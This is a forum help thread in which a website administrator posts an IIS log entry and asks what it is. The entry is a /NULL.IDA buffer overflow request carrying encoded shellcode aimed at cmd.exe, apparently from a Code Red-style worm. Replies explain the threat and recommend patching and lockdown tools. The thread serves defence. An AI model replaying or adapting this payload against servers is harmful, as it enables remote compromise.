[Last Call] Learn how to a build a cloud-first strategyRegister Now

x
  • Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 344
  • Last Modified:

Log File Records

I have a website (on Win2k & IIS 5.0) that insidently goes down every sunday night.  All this time I suspected ASP.NET being the problem with aspnet_wp.exe not restarting.. but I found an interesting correlation between down time and my log files.

Below is one row of an HTTP Request sent last saturday right before my server went down. I see this post being made about 10 times before my server went down.  Can anyone tell me a bit about this?  

My first assumption was that ASP.NET is crashing IIS and therefor the log files are getting erroniouse input, but looking at the IP below, I suspect wrong doings..  This is not my IP, not my host IP and looks to me like someone is trying to exceed the request buffer and access memory space..

Can anyone tell me what this code would do? How can I secure my server from being effected from this type of attack?

LOG:
-------------------------------------------------
217.56.79.212 - - [30/Apr/2005:08:59:51 -0800] "GET /NULL.IDA?CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%u0aeb%ub890%u898b%u77e8%u0000%u0000%u838b%u0094%u0000%u408b%u0564%u0150%u0000%ue0ff%u9090=x&ë+_됐èõÿÿÿoð}-‹÷f¸H3Éf‹È´™ü¬2Īâú$쟙™eªP(¹)½k7_Þf™q”™™q™™q×›™™Úœ™™qÈ›™™q½š™™Þœ™™q'˜™™Öœ™™Þœ™™qæ›™™Òœ™™qÇ™™™q™™™a™íyÒœ™™Éf+”Ÿ™™Þœ™™Éf+”Ÿ™™¶œ™™Éf+œ™™¢œ™™Éf+œ™™!™™™™ÉÖœ™™Éf+\œ™™!™™™™Éf+Oœ™™ZÒœ™™ó™ó€š˜™™ÉÒœ™™Éf+šŸ™™Z”“Îð÷÷íØìíöØííøúò¹Ï«©”“”“ñ+™™™f+&œ™™¶œ™™q_™™™af–/™™™a™íÎ++++󙦜™™Éñ™™™Úœ™™É¶œ™™Éf+/œ™™a™–™™™ó™¦œ™™ÉÚœ™™ÉÒœ™™Éf+šŸ™™afíý++++ró™ñ™™™Úœ™™ÉÒœ™™Éf+‘Ÿ™™a™í§++++afí¬++++ªBʦœ™™ÊÉÚœ™™É¢œ™™Éf+5œ™™a™í++++p²fffªYÑZªYZªBʽ›™™ÊªBÊÊÊÉf++œ™™a™í’++++½›™™Z!ffffZ™™™™Úœ™™^™Ý™™™Éf+þœ™™Úœ™™ªœ™™ÚÙÚ¥®œ™™Ú¡!˜˜™™ÚµÊʪYÉÉÉÙÉÑÉÉ쟙™ÉªYÉf+™ªœ™™Éf+œ™™®œ™™Éf+œ™™Úœ™™™Zñ™™™óÙf+9œ™™ZªYÉw›™™^™•™™™Éªœ™™É¶œ™™Éf+Åœ™™ªYÉw›™™É¢œ™™É®œ™™Éf+Åœ™™Z™™™™™™™™˜™™™É¸š™™^š‰™™™Ê۝™™ÊÉf+eœ™™Aa™ÁåEZZ‰™™™óŠöš™™Éf+½Ÿ™™öš™™Éf+©Ÿ™™a™í»++++é•ge4a™íŠ++++™¥“íi¥Yíu¥5íqZn4™Z™™™™™™™™™™™™™™™™™™™™Úœ™™Éó›f+€Ÿ™™ó™ó˜ó›f+pœ™™af–™™™Þœ™™¦œ™™^š˜™™™óÊóñff™™Éf+§Ÿ™™a™ìé++++ÿöŸ™™ÿݝ™™蟙™ߝ™™afì–++++q³fffߝ™™Þœ™™ó‰۝™™ÊÉf+iœ™™a™ìº++++óœÞœ™™Éf+lœ™™a™ì’++++Þœ™™ZªYZ›™™ú™™™™™™™™™™™™!™™hî¡ÔÃ+™íž++++ÑrhA꥚jïášj繚b׍ªKÏÎȦšb,ÁŸ™™ªP(žjÿ>í•++++ÀÆ^Û{FÀÆÇSß½šZHxšXªPÿ‘ß…šZXx›šX™šZòŸ™™ZÒŸ™™qÉ™™™þŸ™™Z$Êœ™™^Îq¶™™™ÆÉ«YªPnHek7Á¦™íŽ++++ÉÎFq„™™™ÆžÁÞÞÞÞr@Þ¦™ìSZÊþŸ™™ÉfŠÂZÎ$òŸ™™ÊÉfŽÆZ™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™ÒÜË×ÜÕª«™ÚëüøíüÉðéü™ÞüíÊíøëíìéÐ÷ÿöØ™ÚëüøíüÉëöúüêêØ™ÚõöêüÑø÷ýõü™Éüüò×øôüýÉðéü™ÞõöûøõØõõöú™Îëðíüßðõü™Ëüøýßðõü™Êõüüé™Íüëôð÷øíüÉëöúüêê™ÜáðíÍñëüøý™™Îʫƪ«™êöúòüí™ûð÷ý™õðêíü÷™øúúüéí™êü÷ý™ëüúï™úõöêüêöúòüí™ÎÊØÊíøëíìé™þüíñöêí÷øôü™þüíñöêíûà÷øôü™êüíêöúòöéí™™™ÕöøýÕðûëøëàØ™ÞüíÉëöúØýýëüêê™êëî¨éî™úA®?„cmd.exe$ HTTP/1.1" 404 4203



Thank you all in advance!

- Eyal.
 
0
poogy21
Asked:
poogy21
1 Solution
 
gidds99Commented:
I think this may be a worm attempting to take advantage of this IIS vulnrability:

http://www.eeye.com/html/Research/Advisories/AD20010618.html
0
 
r-kCommented:
Is your machine patched with the latest updates for Windows and IIS?
0
 
poogy21Author Commented:

All Patches have been installed.  And I'm not entirely sure that this is actually causing any problem.
I guess it could be a worm.  But why whould I get hit by a worm directly from Italy?  You would imagine that I would get hit by networks closer to my ip block.
But it definetly is a reason for concern.

I have a different problem with ASPNET user permissions and restarting the worker process. But I belive this worm / hacker is trigering a worker process restart.  
And since my aspnet_wp.exe is running into permissions problems, my server times out. :(   when it pures..


Any ideas on how to go about filtering or blocking this type of mischif?
0
Industry Leaders: We Want Your Opinion!

We value your feedback.

Take our survey and automatically be enter to win anyone of the following:
Yeti Cooler, Amazon eGift Card, and Movie eGift Card!

 
srikrishnakCommented:
First, update all the patches and any latest updates...then use IISlockdown to lockdown the IIS webserver...Then you can use MBSA to furthur study the situation..
From the request it seems the requestor is requesting for some junk...Certainly its not a valid request it seems....
Worms can be originated from any place on the planet...Thats the good n bad of internet..when you connect to internet the whole planet is on a single network...
For your ASP.NET question i may not be in a position to solve the issue but you can modify or change it according to your needs with some help from your programmers...
or our EE gurus can definetly help you...
0
 
r-kCommented:
Yes, highly recommend that you download and run MBSA to see if any patches were missed.
You can get it from:

http://www.microsoft.com/technet/security/tools/mbsahome.mspx
0
 
gidds99Commented:
If all patches are up to date then this should not be an issue but by the look of your log file someone (or a worm) appears to be trying to open a remote command prompt (with the CMD.exe at the end of the data).

You could try and push the same code to a test server (if you have one available) to test if your theory on the ASP.net process restart is correct.

Hope this helps.
0

Featured Post

Independent Software Vendors: We Want Your Opinion

We value your feedback.

Take our survey and automatically be enter to win anyone of the following:
Yeti Cooler, Amazon eGift Card, and Movie eGift Card!

Tackle projects and never again get stuck behind a technical roadblock.
Join Now